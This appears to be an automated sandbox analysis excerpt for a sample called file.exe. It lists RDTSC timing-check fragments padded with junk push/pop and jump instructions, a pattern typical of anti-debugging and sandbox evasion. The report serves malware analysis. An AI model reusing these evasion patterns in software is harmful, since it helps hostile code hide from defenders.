Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85B83C second address: 85B842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85B842 second address: 85B848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85B848 second address: 85B861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEF0C74E72Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85B861 second address: 85B865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A9BE second address: 85A9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85B865 second address: 85B86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85B86F second address: 85B873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 806D0C second address: 806D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 806D1D second address: 806D34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FEF0C74E732h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86442C second address: 864430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 866428 second address: 866444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FEF0C74E726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FEF0C74E726h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 866444 second address: 866449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86B859 second address: 86B870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEF0C74E726h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86B870 second address: 86B89F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FEF0C6C7667h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jng 00007FEF0C6C7664h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86B89F second address: 86B8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86F835 second address: 86F839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86F839 second address: 86F843 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEF0C74E726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86F843 second address: 86F84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86F84B second address: 86F84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86F995 second address: 86F9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C765Dh 0x00000009 jnp 00007FEF0C6C7656h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86F9B2 second address: 86F9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FEF0C74E739h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FB93 second address: 86FB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 870170 second address: 870177 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8702EA second address: 870300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEF0C6C765Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 875B1C second address: 875B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 875B22 second address: 875B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 874788 second address: 87478C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87478C second address: 8747A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7661h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87491A second address: 87491E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87491E second address: 87496F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEF0C6C7664h 0x0000000d jmp 00007FEF0C6C7667h 0x00000012 pushad 0x00000013 jmp 00007FEF0C6C765Dh 0x00000018 jmp 00007FEF0C6C765Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 874AD5 second address: 874AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FEF0C74E72Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 874AE4 second address: 874B0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FEF0C6C7691h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEF0C6C7669h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 874B0F second address: 874B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8754D1 second address: 8754F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEF0C6C7656h 0x0000000a jmp 00007FEF0C6C7668h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87583C second address: 875840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 875840 second address: 875848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 878F19 second address: 878F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87BC9B second address: 87BCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 je 00007FEF0C6C765Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8801F2 second address: 8801F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8801F6 second address: 8801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8801FA second address: 88020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FEF0C74E726h 0x0000000e jp 00007FEF0C74E726h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 88020E second address: 88023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7666h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FEF0C6C7660h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 88023F second address: 880249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 88037B second address: 8803A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 push esi 0x0000000a jmp 00007FEF0C6C7667h 0x0000000f pop esi 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8803A6 second address: 8803AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 880D3A second address: 880D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FCAF3 second address: 7FCAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FCAF9 second address: 7FCB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FEF0C6C7669h 0x0000000b jno 00007FEF0C6C7656h 0x00000011 jmp 00007FEF0C6C765Dh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FCB1A second address: 7FCB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ecx 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 885F51 second address: 885F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7667h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 884E1D second address: 884E26 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 841A57 second address: 841A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 841A5D second address: 841AD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E72Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c xor edx, 680EA501h 0x00000012 lea eax, dword ptr [ebp+1249586Ch] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FEF0C74E728h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 nop 0x00000033 jmp 00007FEF0C74E738h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FEF0C74E735h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 841AD2 second address: 8283AC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEF0C6C766Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or ecx, dword ptr [ebp+122D22C0h] 0x00000011 call dword ptr [ebp+122D346Dh] 0x00000017 pushad 0x00000018 jp 00007FEF0C6C766Bh 0x0000001e jmp 00007FEF0C6C7665h 0x00000023 jmp 00007FEF0C6C7660h 0x00000028 push edi 0x00000029 jbe 00007FEF0C6C7656h 0x0000002f jmp 00007FEF0C6C7664h 0x00000034 pop edi 0x00000035 jmp 00007FEF0C6C765Bh 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007FEF0C6C7666h 0x00000043 jmp 00007FEF0C6C7660h 0x00000048 jbe 00007FEF0C6C765Ch 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 842505 second address: 842509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 842509 second address: 84250F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84250F second address: 84253D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E732h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dl, ah 0x0000000e push 00000004h 0x00000010 jnp 00007FEF0C74E726h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007FEF0C74E728h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8850F6 second address: 885102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FEF0C6C7656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885102 second address: 885108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885108 second address: 88510C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88539A second address: 8853A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEF0C74E726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853A4 second address: 8853AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853AF second address: 8853B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853B4 second address: 8853BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007FEF0C6C7656h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853BF second address: 8853C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885639 second address: 88563F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88563F second address: 885660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEF0C74E738h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885660 second address: 885664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885664 second address: 885668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885949 second address: 88594D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88594D second address: 885965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E732h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885965 second address: 885972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FEF0C6C7656h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885972 second address: 88597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88597E second address: 885982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885982 second address: 8859AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEF0C74E72Fh 0x0000000d jmp 00007FEF0C74E72Eh 0x00000012 jo 00007FEF0C74E72Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A20D second address: 88A229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A381 second address: 88A38D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A38D second address: 88A391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A627 second address: 88A64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEF0C74E730h 0x0000000a jmp 00007FEF0C74E72Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88CE2B second address: 88CE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88CE2F second address: 88CE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893713 second address: 893719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893719 second address: 89371D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89371D second address: 893723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B3C second address: 893B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEF0C74E726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B46 second address: 893B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B4C second address: 893B70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007FEF0C74E726h 0x00000009 jmp 00007FEF0C74E733h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B70 second address: 893BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEF0C6C7656h 0x0000000a jl 00007FEF0C6C7656h 0x00000010 popad 0x00000011 jp 00007FEF0C6C766Fh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8946F5 second address: 8946FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89735B second address: 897360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897696 second address: 8976A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89ABBF second address: 89AC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C7666h 0x00000009 popad 0x0000000a jo 00007FEF0C6C7665h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEF0C6C7661h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AC04 second address: 89AC48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E738h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FEF0C74E730h 0x00000014 push eax 0x00000015 jmp 00007FEF0C74E731h 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AC48 second address: 89AC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEF0C6C7666h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AED3 second address: 89AEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FEF0C74E735h 0x0000000c jmp 00007FEF0C74E72Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AEFC second address: 89AF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEF0C6C7656h 0x0000000a popad 0x0000000b jng 00007FEF0C6C765Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3A71 second address: 8A3A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEF0C74E726h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FEF0C74E726h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
